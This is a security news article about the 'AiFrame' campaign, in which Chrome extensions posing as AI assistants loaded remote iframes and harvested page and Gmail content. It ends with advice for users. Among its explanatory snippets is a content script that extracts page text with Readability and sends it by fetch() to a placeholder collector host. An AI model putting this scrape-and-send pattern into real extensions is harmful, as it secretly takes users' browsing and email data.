If you're a busy professional, your time is valuable, and so is your online security. Even with Google's continuous efforts to enhance safety, malicious browser extensions are still making their way onto the Chrome Web Store, putting your data and devices at risk. These harmful add-ons can hijack your browsing data, steal your credentials, or inject unwanted content into your browser.
Introducing the AiFrame Campaign
Researchers at LayerX, a browser security platform, recently uncovered a malicious operation dubbed the AiFrame campaign: 30 Chrome extensions disguised as AI assistants for tasks like summarization, chat, writing, and Gmail support.
LayerX traced these extensions back to a common domain, tapnetic[.]pro, and found that they shared:
- The same internal structure
- Identical JavaScript logic
- Similar permission requests
- A unified backend infrastructure
These overlaps indicate that the campaign was not a scattering of unrelated extensions but a coordinated operation targeting unsuspecting users.
Over 300,000 Users Affected
In total, more than 300,000 users installed these malicious extensions. The most prominent was Gemini AI Sidebar, which had around 80,000 users before its removal from the Chrome Web Store.
Further investigation shows that several other harmful extensions from the campaign remain live on the Chrome Web Store, some with tens of thousands of installs. Notable examples include:
- AI Sidebar – 70,000 users
- AI Assistant – 60,000 users
- ChatGPT Translate – 30,000 users
- AI GPT – 20,000 users
- ChatGPT – 20,000 users
- Another AI Sidebar – 10,000 users
- Google Gemini – 10,000 users
Despite their different names, these extensions share the same underlying code and structure, making them a significant threat.
How These Extensions Operate
While these extensions claim to be AI assistants, they don't run any AI functionality on your device. Instead, they create a full-screen iframe that loads content from a remote domain. This is a serious security risk: the operators can change what the extension does at any time, without submitting a new version for Chrome Web Store review.
Security experts liken this method to how Microsoft Office Add-ins work, where remote logic can be modified without requiring a new version to be pushed out.
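As a rough illustration of this pattern (not code recovered from the extensions themselves), a content script using the remote-iframe technique might look something like the sketch below; the domain is a placeholder:

```javascript
// Minimal, hypothetical sketch of the remote-iframe pattern described above.
// The domain below is a placeholder, not the campaign's real infrastructure.
const frame = document.createElement("iframe");
frame.src = "https://ai-panel.example-remote-host.com/sidebar";

// Stretch the iframe across the whole viewport so it looks like a native AI overlay.
Object.assign(frame.style, {
  position: "fixed",
  top: "0",
  left: "0",
  width: "100vw",
  height: "100vh",
  border: "none",
  zIndex: "2147483647" // keep the overlay above everything else on the page
});

document.documentElement.appendChild(frame);

// From here on, everything the user sees and types lives on the remote page,
// which the operator can change at any time without a Chrome Web Store review.
```

Because the interesting logic lives on the server, store reviewers only ever see a thin, innocuous-looking shell.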
Stealthy Data Theft
While displaying a deceptive AI interface, these extensions quietly extract your data in the background. LayerX found that these malicious add-ons could:
- Scrape content from the websites you visit
- Capture sensitive data from authentication pages
- Utilize Mozilla’s Readability library to extract page content (sketched below)
Alarmingly, 15 of the extensions specifically target Gmail users. When features like AI-assisted replies are invoked, your email content can be transmitted to the operator’s backend infrastructure, breaching Gmail’s security boundary.
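For the technically curious, the scrape-and-send pattern described above can be sketched roughly as follows. This is an illustrative example only, not code taken from the extensions; it assumes Mozilla's Readability library is bundled into the content script, and the backend URL is a placeholder:

```javascript
// Hypothetical sketch of the scraping pattern, not recovered malware code.
// Assumes the extension bundles Mozilla's Readability library.
import { Readability } from "@mozilla/readability";

function harvestPage() {
  // Readability parses a copy of the DOM and returns the readable article content.
  const article = new Readability(document.cloneNode(true)).parse();
  if (!article) return;

  // Ship the extracted text and page URL to a remote collection endpoint
  // (placeholder URL below). On Gmail, this text can include message bodies.
  fetch("https://collector.example-backend.com/ingest", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      url: location.href,
      title: article.title,
      text: article.textContent
    })
  });
}

harvestPage();
```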
Why This Attack is Particularly Alarming
These so-called AI assistants may seem harmless, but they can:
- Change their behavior remotely at any time
- Inject harmful scripts
- Steal your data without your knowledge
Although some extensions have been removed, many still pose a risk to users.
Protecting Yourself
Cybersecurity experts suggest several precautions to keep you safe:
- Verify the Developer: Always check their website, reputation, and previous projects.
- Don't Rely Solely on Ratings: Be wary of fake reviews that inflate an extension's score.
- Use Antivirus Software: It can help detect suspicious extension behavior.
- Limit Permissions: Avoid extensions that request excessive access, such as permission to read data on every site you visit (see the example after this list).
- Utilize Web-Based AI Tools: Accessing AI services in a regular browser tab is typically safer than installing add-ons.
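As a rough guide to what "excessive access" can look like, the hypothetical Manifest V3 excerpt below shows the kind of permission profile worth pausing over before you click install. It is not taken from any of the extensions named above, and the comments are annotations only (real manifest.json files do not permit comments):

```json
{
  "manifest_version": 3,
  "name": "Hypothetical AI Helper",       // illustrative name only
  "permissions": ["scripting", "tabs", "storage"],
  "host_permissions": ["<all_urls>"],     // may read and change data on every site
  "content_scripts": [
    {
      "matches": ["<all_urls>"],          // injected into every page you open
      "js": ["content.js"]
    }
  ]
}
```

Chrome surfaces broad host access with an install-time warning along the lines of "Read and change all your data on all websites"; that prompt, combined with vague AI branding, is a good cue to look more closely.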
For avid extension users, identity monitoring services can also help mitigate damage if data theft occurs.
The Bottom Line
The AiFrame campaign serves as a stark reminder that malicious extensions are evolving, and even tools branded as AI can harbor serious threats. With over 300,000 users already impacted and some extensions still available, taking a few extra seconds to verify an extension before installation could save you from severe privacy and financial repercussions down the line.
